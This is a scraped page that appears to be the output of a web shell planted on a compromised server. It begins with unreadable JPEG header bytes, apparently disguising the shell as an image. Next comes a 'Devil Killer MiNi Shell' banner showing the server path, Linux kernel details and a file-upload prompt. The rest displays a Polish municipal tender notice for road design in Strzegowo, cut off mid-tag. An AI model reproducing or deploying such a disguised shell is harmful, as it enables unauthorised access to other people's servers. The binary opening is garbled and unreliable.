JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20221207/0048279101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej budowy drogi gminnej relacji Grabienice – Smętne - Czarnocin. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA STRZEGOWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130378440</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Plac Wolności 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzegowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">06-445</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@strzegowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.strzegowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej budowy drogi gminnej relacji Grabienice – Smętne - Czarnocin. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4967633f-7635-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00482791</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00026316/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Opracowanie dokumentacji projektowej budowy drogi gminnej relacji Grabienice – Smętne - Czarnocin</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://strzegowo.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym,<br/>a Wykonawcami, w tym złożenie ofert, odbywa się za pośrednictwem platformy zakupowej<br/>eZamawiający znajdującej się pod adresem: https://strzegowo.ezamawiajacy.pl. Szczegóły dotyczące<br/>złożenia oferty zostały opisane w „Instrukcji dla Wykonawcy”, znajdującej się w zakładce „Baza Wiedzy/Plan zamówień publicznych”.<br/>2. Komunikacja za pośrednictwem poczty elektronicznej na adres e-mail: przetargi@strzegowo.pl, jest<br/>dopuszczalna w wyjątkowej sytuacji, np. w przypadku awarii platformy zakupowej.<br/>Adres strony internetowej do elektronicznego składania ofert: https://strzegowo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym,<br/>a Wykonawcami, w tym złożenie ofert, odbywa się za pośrednictwem platformy zakupowej<br/>eZamawiający znajdującej się pod adresem: https://strzegowo.ezamawiajacy.pl. Szczegóły dotyczące<br/>złożenia oferty zostały opisane w „Instrukcji dla Wykonawcy”, znajdującej się w zakładce „Regulacje i<br/>procedury procesu zakupowego”.<br/>2. Komunikacja za pośrednictwem poczty elektronicznej na adres e-mail: przetargi@strzegowo.pl, jest<br/>dopuszczalna w wyjątkowej sytuacji, np. w przypadku awarii platformy zakupowej.<br/>3. Wykonawca w postępowaniu o udzielenie niniejszego zamówienia publicznego bezpłatnie korzysta,<br/>rejestruje się lub loguje (w przypadku posiadania konta na platformie zakupowej), akceptuje warunki<br/>korzystania z platformy zakupowej, określone w Regulaminie zamieszczonym na stronie internetowej<br/>https://strzegowo.ezamawiajacy.pl oraz uznaje go za wiążący.<br/>4. Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający<br/>zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację<br/>w procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia<br/>wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta,<br/>wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>5. Szczegóły funkcjonowania platformy zakupowej zostały opisane w „Instrukcji dla Wykonawcy”.<br/>6. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami<br/>korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania<br/>teleinformatycznego Platformy zakupowej Gminy Strzegowo tel. +48 22 257 22 23 (infolinia dostępna<br/>w dni robocze, w godzinach 9:00-17:00, e-mail: oneplace@marketplanet.pl<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany i wycofania oferty oraz do komunikacji wynosi 100 MB. Zalecany format plików to: .pdf, .doc,<br/>.docx, .xls, .xlsx, .rtf.<br/>8. Za datę wpływu oświadczeń, wniosków, zawiadomień, cyfrowych odwzorowań dokumentów oraz<br/>innych informacji przekazywanych na adres e-mail Zamawiającego przyjmuje się datę dostarczenia<br/>wiadomości na adres e-mail Zamawiającego. W przypadku skorzystania<br/>z Platformy eZamawiający za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji<br/>przyjmuje się datę ich złożenia/wysłania na Platformie.<br/>9. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy<br/>przesłać za pośrednictwem Platformy Zakupowej przez opcję „zadaj pytanie lub przy użyciu zakładki<br/>„Korespondencja”: w celu zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem<br/>myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić dane<br/>Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym<br/>kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje<br/>potwierdzenie wysłania pytania poprzez komunikat systemowy &#34;pytanie wysłane&#34;.<br/>10. Sposób sporządzenia dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz<br/>informacji musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>11. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Wójt<br/>Gminy Strzegowo (dalej: „ADMINISTRATOR”), z siedzibą: Plac Wolności 32, 06-445 Strzegowo. Z<br/>Administratorem można się kontaktować pisemnie, za pomocą poczty tradycyjnej na adres: Plac<br/>Wolności 32, 06-445 Strzegowo lub drogą e-mailową pod adresem: ug@strzegowo.pl<br/>2. Administrator wyznaczył Inspektora Ochrony Danych - Andrzeja Rybus-Tołłoczko,<br/>z którym można się skontaktować pod adresem mailowym: iodo@rt-net.pl.<br/>3. Dane osobowe są przetwarzane na podstawie rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) oraz ustawy z dnia 11 września 2019<br/>r. Prawo zamówień publicznych.<br/>4. Przetwarzanie danych osobowych odbywa się w celu przeprowadzenia postępowania o udzielenie<br/>zamówienia publicznego – art. 6 ust. 1 lit. c, e RODO,<br/>5. Dane osobowe nie pochodzą od stron trzecich.<br/>6. Administrator nie zamierza przekazywać danych do państwa trzeciego lub organizacji<br/>międzynarodowej.<br/>7. Administrator będzie przekazywał dane osobowe innym podmiotom, tylko na podstawie przepisów<br/>prawa, w tym w szczególności do: Urzędu Zamówień Publicznych, organów kontrolnych, a także na<br/>podstawie zawartych umów powierzenia przetwarzania danych osobowych, w tym do dostawców usług<br/>teleinformatycznych.<br/>8. Dane osobowe będą przetwarzane przez Administratora do 5 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia, zgodnie z przepisami prawa. 9. Osoba, której dane dotyczą ma prawo do<br/>żądania od administratora dostępu do danych osobowych,<br/>ich sprostowania, usunięcia lub ograniczenia przetwarzania oraz o prawo do wniesienia sprzeciwu<br/>wobec przetwarzania, a także prawo do przenoszenia danych.<br/>10. Skargę nas działania Administratora można wnieść do Prezesa Urzędu Ochrony Danych<br/>Osobowych.<br/>11. Podanie danych osobowych jest wymogiem udziału w postępowaniu o udzielenie zamówienia. Ich<br/>niepodanie spowoduje brak możliwości udziału w postępowaniu.<br/>12. Administrator nie przewiduje zautomatyzowanego podejmowania decyzji.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.26.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej oraz uzyskanie decyzji o zezwoleniu na realizację<br/>inwestycji drogowej na podstawie ustawy z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji<br/>inwestycji w zakresie dróg publicznych dla budowy drogi gminnej relacji Grabienice – Smętne - Czarnocin, gm. Strzegowo,<br/>na całej długości zgodnie z załącznikiem graficznym.<br/>1) Parametry techniczne drogi:<br/>- długość odcinka drogi około 2650 mb,<br/>- klasa drogi D,<br/>- kategoria ruchu KR 1,<br/>2) Zakres budowy:<br/>- poszerzenie i remont jezdni o szerokości 3,50 m z mijankami,<br/>- poszerzenie jezdni na mijankach do 5,0 m,<br/>- wykonanie nowej nawierzchni asfaltowej,<br/>- szerokość poboczy – do 1,25 m,<br/>- wykonanie nowej podbudowy i nawierzchni na odcinku około 400 mb (po<br/>istniejącym śladzie drogi gruntowej),<br/>- przebudowa i remont skrzyżowań,<br/>- rozwiązanie likwidacji istniejącego w jezdni systemu korzeniowego (wysadziny)<br/>i zabezpieczenie projektowanej drogi przed ponowną ingerencją systemu<br/>korzeniowego,<br/>- ulepszenie i wzmocnienie poboczy,<br/>- odwodnienie - odmulenie i odnowienie rowów przydrożnych wraz z przebudową<br/>i budową zjazdów,<br/>- budowa i przebudowa istniejących przepustów poprzecznych pod jezdnią,<br/>- oznakowanie.<br/>Opis przedmiotu zamówienia stanowi załącznik nr 9 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się<br/>podanymi kryteriami i odpowiadającymi im znaczeniami. Za najkorzystniejszą zostanie uznana oferta,<br/>która uzyska największą sumę punktów w obu kryteriach w oparciu o następujący wzór:<br/>P = Pc + Pr ,<br/>P = suma punktów jaką Wykonawca uzyskał za oba kryteria oceny ofert,<br/>Pc - liczba punktów otrzymanych w kryterium „cena”,<br/>Pr - liczba punktów otrzymanych w kryterium „okres rękojmi”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym;<br/>Określenie warunków: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>3) sytuacji ekonomicznej lub finansowej;<br/>Określenie warunków: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>4) zdolności technicznej lub zawodowe<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -<br/>w tym okresie, wykonał co najmniej jedno zadanie polegające na opracowaniu dokumentacji projektowej (zawierającej<br/>projekt budowlany) budowy, przebudowy lub rozbudowy drogi klasy minimum D, o długości co najmniej 1000 mb, <br/>b) dysponuje osobami zdolnymi do wykonania zamówienia, tj. co najmniej jednym projektantem posiadającym uprawnienia w specjalności drogowej, który opracował co najmniej jeden projekt budowlany budowy, przebudowy lub rozbudowy drogi klasy minimum D, obejmujący odcinek drogi<br/>o długości co najmniej 1000 mb. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)<br/>wykazu usług wykonanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem, przedmiotu, dat wykonania<br/>i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane, przy czym dowodami,<br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały<br/>wykonane, a jeżeli wykonawca<br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy - (wzór stanowi załącznik<br/>Nr 5 do SWZ),<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami (wzór stanowi załącznik Nr 8 do SWZ),</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,<br/>zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, o których mowa w rozdziale XXII ust. 4 pkt 1 lit. a SWZ – składa<br/>dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości,<br/>jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność<br/>gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z<br/>podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym<br/>mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w XXII ust. 4 pkt 1 lit. a SWZ, zastępuje się je odpowiednio w całości lub<br/>w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby<br/>albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał<br/>dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub<br/>administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze<br/>względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp<br/>dane umożliwiające dostęp do tych środków;<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualności.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) formularz ofertowy – załącznik nr 1 do SWZ;<br/>2) oświadczenie o braku podstaw do wykluczenia i spełnianiu warunków udziału<br/>w postępowaniu – załącznik nr 2 do SWZ;<br/>3) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia – załącznik nr 6 do SWZ - jeśli dotyczy;<br/>4) oświadczenie podmiotu udostępniającego zasoby – załącznik nr 7 do SWZ – jeśli dotyczy;<br/>5) dowód wniesienia wadium,<br/>6) odpowiednie pełnomocnictwa (jeżeli wykonawcę reprezentuje pełnomocnik), <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span 